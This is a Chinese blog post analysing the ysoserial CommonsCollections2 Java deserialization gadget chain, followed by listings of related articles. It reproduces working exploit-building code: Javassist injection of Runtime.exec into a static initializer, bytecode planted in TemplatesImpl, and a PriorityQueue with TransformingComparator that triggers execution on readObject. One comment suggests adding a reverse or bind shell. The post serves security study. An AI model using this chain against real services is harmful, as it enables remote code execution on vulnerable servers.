ysoserial-cc2 java反序列化

最新推荐文章于 2025-04-21 09:56:17 发布
原创 最新推荐文章于 2025-04-21 09:56:17 发布 · 299 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java

该博客详细解析了一个Java反序列化漏洞的利用过程,包括如何构造恶意的TemplatesImpl类,通过插入 payload 类的字节码并在静态初始化块中执行命令。整个流程涉及Javassist库动态生成类、类继承、优先级队列等,最终通过TransformerFactory的newTransformer方法触发payload执行。
yso-cc2
1从入口看

1)
在这里插入图片描述

2)在这里插入图片描述
3)createTemplatesImpl方法,与jdk7u21的利用类相同

  public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
            throws Exception {
        final T templates = tplClass.newInstance();

        // use template gadget class
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
        pool.insertClassPath(new ClassClassPath(abstTranslet));
        final CtClass clazz = pool.get(StubTransletPayload.class.getName());
        // run command in static initializer
        // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
            command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
            "\");";
        clazz.makeClassInitializer().insertAfter(cmd);
        // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        CtClass superC = pool.get(abstTranslet.getName());
        clazz.setSuperclass(superC);

        final byte[] classBytes = clazz.toBytecode();

        // inject class bytes into instance
        Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
            classBytes, ClassFiles.classAsBytes(Foo.class)
        });

        // required to make TemplatesImpl happy
        Reflections.setFieldValue(templates, "_name", "Pwnr");
        Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
        return templates;
    }

4)首先获取 StubTransletPayload 类

    public static class StubTransletPayload extends AbstractTranslet implements Serializable {

        private static final long serialVersionUID = -5971610431559700674L;


        public void transform ( DOM document, SerializationHandler[] handlers ) throws TransletException {}


        @Override
        public void transform ( DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {}
    }

5)Javassist获取生成class文件,设置父类AbstractTranslet,修改类本身也继承此类此处可不写。

 clazz.makeClassInitializer().insertAfter(cmd); 将payload 放入静态代码模块中
 clazz.setName("ysoserial.Pwner" + System.nanoTime());设置类名
 CtClass superC = pool.get(abstTranslet.getName());
 clazz.setSuperclass(superC);类继承AbstractTranslet,

将类输出看下

    ClassPool pool1 = ClassPool.getDefault();
        pool1.insertClassPath(new ClassClassPath(StubTransletPayload.class));
        pool1.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        final CtClass clazz = pool1.get(StubTransletPayload.class.getName());
        // run command in static initializer
        // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
        String command= "calc";
        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
                command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
                "\");";
        clazz.makeClassInitializer().insertAfter(cmd);
        clazz.setName("javassistdemo" + System.nanoTime());
        CtClass superC = pool1.get(AbstractTranslet.class.getName());
         //StubTransletPayload类本身也是继承于AbstractTranslet
        //clazz.setSuperclass(superC);
        clazz.writeFile();
        clazz.detach();

结果如下

public class javassistdemo2345088706633400 extends AbstractTranslet implements Serializable {
    private static final long serialVersionUID = -5971610431559700674L;

    public javassistdemo2345088706633400() {
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    static {
        Object var1 = null;
        Runtime.getRuntime().exec("calc");
    }
}

6)将payload类字节码 赋值给TemplatesImpl的 _bytecodes,另外给_name和_tfactory赋值,(_tfactory为TransformerFactoryImpl类实例)

     Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
            classBytes, ClassFiles.classAsBytes(Foo.class)
        });

        // required to make TemplatesImpl happy
        Reflections.setFieldValue(templates, "_name", "Pwnr");
        Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
        return templates;
    }

7)返回TemplatesImpl类,之后 创建PriorityQueue类(优先级队列),将transformer对象赋值给TransformingComparator的transformer参数。

final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
		// create queue with numbers and basic comparator
		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
-----------------------------------------------------------------------
 public PriorityQueue(int initialCapacity,
                         Comparator<? super E> comparator) {
        // Note: This restriction of at least one is not actually needed,
        // but continues for 1.5 compatibility
        if (initialCapacity < 1)
            throw new IllegalArgumentException();
        this.queue = new Object[initialCapacity];
        this.comparator = comparator;
    }

8)反射修改InvokerTransformer的iMethodName

	Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

9)取出上后面的PriorityQueue的queue属性并赋值,templates为恶意的类。

	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
		queueArray[0] = templates;
		queueArray[1] = 1;

10)返回PriorityQueue类,所以入口就是PriorityQueue的readobject
关键函数heapify().

    private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        // Read in size, and any hidden stuff
        s.defaultReadObject();

        // Read in (and discard) array length
        s.readInt();

        queue = new Object[size];

        // Read in all elements.
        for (int i = 0; i < size; i++)
            queue[i] = s.readObject();

        // Elements are guaranteed to be in "proper order", but the
        // spec has never explained what that might be.
        heapify();
    }

11)heapify()

  private void heapify() {
        for (int i = (size >>> 1) - 1; i >= 0; i--)
            siftDown(i, (E) queue[i]);
    }
   // comparator  为 第七步TransformingComparator
  private void siftDown(int k, E x) {
        if (comparator != null)
            siftDownUsingComparator(k, x);
        else
            siftDownComparable(k, x);
    }
进入比较函数compare    
  private void siftDownUsingComparator(int k, E x) {
        int half = size >>> 1;
        while (k < half) {
            int child = (k << 1) + 1;
            Object c = queue[child];
            int right = child + 1;
            if (right < size &&
                comparator.compare((E) c, (E) queue[right]) > 0)
                c = queue[child = right];
            if (comparator.compare(x, (E) c) <= 0)
                break;
            queue[k] = c;
            k = child;
        }
        queue[k] = x;
    }
TransformingComparator的compare    如下
   public int compare(I obj1, I obj2) {
        O value1 = this.transformer.transform(obj1);
        O value2 = this.transformer.transform(obj2);
        return this.decorated.compare(value1, value2);
    }
  this.transformer.transformc()触发。

12)
this.iMethodName在第八步赋值为newTransformer
在这里插入图片描述
13)第九步将queueArray 的值赋值为恶意的templates和1,在此处进行比较,调用templates的newTransformer方法。此处_tfactory的值其实并不重要一样可以进入getTransletInstance函数

 public synchronized Transformer newTransformer()
        throws TransformerConfigurationException
    {
        TransformerImpl transformer;

        transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
            _indentNumber, _tfactory);

        if (_uriResolver != null) {
            transformer.setURIResolver(_uriResolver);
        }

        if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
            transformer.setSecureProcessing(true);
        }
        return transformer;
    }

14)getTransletInstance方法
有name值的判断,所以前面赋值不为空,_class 为空调用defineTransletClasses方法
defineTransletClasses方法对_bytecodes里的字节进行load,触发静态模块代码,paylaod执行。

  private Translet getTransletInstance()
        throws TransformerConfigurationException {
        try {
            if (_name == null) return null;

            if (_class == null) defineTransletClasses();
            ...
  -----------------------------------------
    private void defineTransletClasses()
        throws TransformerConfigurationException {

        if (_bytecodes == null) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
            throw new TransformerConfigurationException(err.toString());
        }

        TransletClassLoader loader = (TransletClassLoader)
            AccessController.doPrivileged(new PrivilegedAction() {
                public Object run() {
                    return new TransletClassLoader(ObjectFactory.findClassLoader());
                }
            });

        try {
            final int classCount = _bytecodes.length;
            _class = new Class[classCount];

            if (classCount > 1) {
                _auxClasses = new Hashtable();
            }

            for (int i = 0; i < classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);
                final Class superClass = _class[i].getSuperclass();

                // Check if this is the main class
                if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                    _transletIndex = i;
                }
                else {
                    _auxClasses.put(_class[i].getName(), _class[i]);
                }
            }
Java反序列化-CC2、4分析
The_W0rld的博客
07-22 1495
CC2中,使用的将不是前面的commons-collections依赖了,而是commons-collections4这个依赖,并且也采取了一下新的利用类PriorityQueue和TransformingComparator。通过PriorityQueue做为入口点,TransformingComparator作为跳板去触发利用链。...
commons-collections2(cc2)反序列化链分析
遇事不决冲冲冲
02-16 3365
大的思路是将恶意参数放到`TemplatesImpl`类中的`_bytecodes`属性中,反射构造`PriorityQueue`队列的`comparator`和`queue`两个字段,将`PriorityQueue`队列的`comparator`字段设置为`TransformingComparator`(创建一个`InvokerTransformer`并传递一个`newTransformer`方法,然后将`InvokerTransformer`方法名传递给`TransformingComparator`)
8-java安全——java反序列化CC2链分析
网络安全
07-19 3279
上一篇分析了CC1链,本篇继续分析ysoserial工具的 apache commons collections 2利用链。 CC1链在实际利用过程存在一些限制,例如jdk1.8版本以上已经无法利用反序列化漏洞了,通过分析发现jdk8u181版本中改写了sun.reflect.annotation.AnnotationInvocationHandler类的readObject方法,CC1链在jdk8版本以上已经被修复了,因此jdk8版本以上重新构造了一条新的利用链(CC2链)。 不过CC2链使用
Java安全』反序列化-CC2反序列化漏洞POP链分析_ysoserial CommonsCollections2 PoC分析
Ho1aAs‘s Blog
03-10 951
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. InvokerTransformer.transform()反射调用TemplatesImpl.newTransformer()2. TransformingComparator.compare()调用this.transformer.transform()3. PriorityQueue反序列化调用comparator.compare()为什么PriorityQueue还要再添加一个元素?为什么向PriorityQueue添加1、InvokerT
java反序列化CC2超详细易懂分析
2301_79724395的博客
04-18 1948
抄一下图参考https://www.cnblogs.com/byErichas/p/15749668.html。
JAVA反序列化漏洞-ysoserial-URLDNS链分析
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-29 1187
对于进行反序列化漏洞原理的学习,URLDNS这条链比较好理解,对后续学习打个基础,URLDNS也是经常用于验证Java反序列化漏洞是否存在,验证服务主机是否出网等情况,为了后期进一步有效性的利用。让我们开始学习吧!
Java安全—原生反序列化&重写方法&链条分析&触发类
2301_76227305的博客
11-27 1181
虽然今天的内容看起来有点复杂,但总结起来就一件事,想办法调用其它的readObject,而不是去调用原本的readObject。最后还是要声明一下,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Java反序列化之Commons-Beanutils1链与无 commons-collections的Shiro反序列化利用
weixin_45682070的博客
02-11 1707
Apache Commons Beanutils 首先看一下 Commons Beanutils包,Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。 JavaBean可以简单的理解为一个Java类对象。 commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ,让使用者可以直接调用任意JavaBean的getter方法,看面的de
红队专题-漏洞挖掘-代码审计-反序列化
最新发布
aming小老弟
04-21 2186
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
Java安全研究——反序列化漏洞之CC2
weixin_43889136的博客
05-10 1905
0x01
Java反序列化(四)——CC4、CC2
Xzy03210321的博客
08-15 1059
最近比较忙,CC5和CC7先不写了,写一篇大半天。引用我老学长John的图。
Java安全学习笔记--基于ysoserial反序列化利用工具CC2CC5链构造方式的思考
m0_64685672的博客
02-02 2673
前言:ysoserial反序列化利用工具的CC5链和CC6链的利用链核心都还是LazyMap+ChainedTransformer,两条利用链通过TideMapEntry的toString和hashCode方法来触发核心利用链,最终触发get方法 把三个方法放一块 public V getValue() { return this.map.get(this.key);//这里的this.map就是我们的LazyMap } //LazyMap的get方法: public V get(Object
Yso-Java Hack 进阶:利用反序列化漏洞打内存马
Karka_的博客
08-04 636
Yso-Java Hack 帮我们完成了很多需要代码操作的事情,而且支持自定义恶意类,可扩展性还是很强的,希望本篇文章可以给师傅们一些新思路,提高工作效率。Yso-Java Hack 帮我们完成了很多需要代码操作的事情,而且支持自定义恶意类,可扩展性还是很强的,希望本篇文章可以给师傅们一些新思路,提高工作效率。
Java安全』反序列化-Jdk7u21 POP链分析_ysoserial Jdk7u21 payload 分析_TemplateImpl触发反序列化漏洞
Ho1aAs‘s Blog
03-02 1502
文章目录前言原理分析TemplatseImpl.getOutputProperties()触发类加载动态代理AnnotationInvocationHandler.equal()调用getOutputProperties()ysoserial payload 分析代码审计完 前言 环境为Jdk<=7u21 +自带Xalan 原作者文章: Jdk7u21.java Java 7u21 Security Advisory 原理分析 TemplatseImpl.getOutputProperties()
ysoserial CommonsColletions2分析
洋洋的小黑屋
06-22 391
ysoserial CommonsColletions2分析 前言 此文章是ysoserial中 commons-collections2 的分析文章,所需的知识包括java反射,javassist。 在CC2中是用的 PriorityQueue#reaObject作为反序列化的入口,利用javassist创建了一个攻击类,使用TemplatesImpl类来承载他 而CC1利用链在JDK1.8 ...
[Java安全]ysoserial_CommonCollections2_Transformer/TemplatesImpl链分析
cosmoslin的博客
04-04 1482
本机环境: JDK版本:jdk1.7u_51 CC版本:Commons-Collections 4.0 调用链 Gadget chain: ObjectInputStream.readObject() PriorityQueue.readObject() ... TransformingComparator.compare() InvokerTransformer.transform() Method.invoke() Runtime.e
JAVA反序列化-cc2
Bloyet
03-30 368
越来越熟练了,gogogo还剩几条了。
使用ysoserial生成反序列化文件
热门推荐
一个码农的笔记
06-01 4万+
感谢清水大佬的帮助,这个代码是他的 import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import ysoserial.payloads.CommonsBeanutils1; public class Test { public Test() { } public
java get方法不序列化_一次受限环境中的Java反序列化漏洞挖掘到Get Shell - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com...
weixin_35599418的博客
02-16 294
在本文中,我们将向你展示一个利用不安全的反序列化漏洞的过程,我们将以WebGoat8反序列化挑战(部署在Docker上)为例。只需执行sleep5秒即可解决挑战。但是,我们将会进一步寻求乐趣并尝试get shell。介绍Java反序列化问题在安全领域已经被安全人员所熟知很多年了。2015年,两名安全研究人员Chris Frohoff和Gabriel Lawrence在AppSecCali上发表...
Java反序列化漏洞工具ysoserial-master分析
综上所述,ysoserial-master.zip文件作为Java反序列化安全领域的关键资源,不仅为安全研究人员提供了一种强大的工具,同时也为开发者和安全专家提供了一个学习和研究反序列化漏洞的平台。通过对该工具的研究和使用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值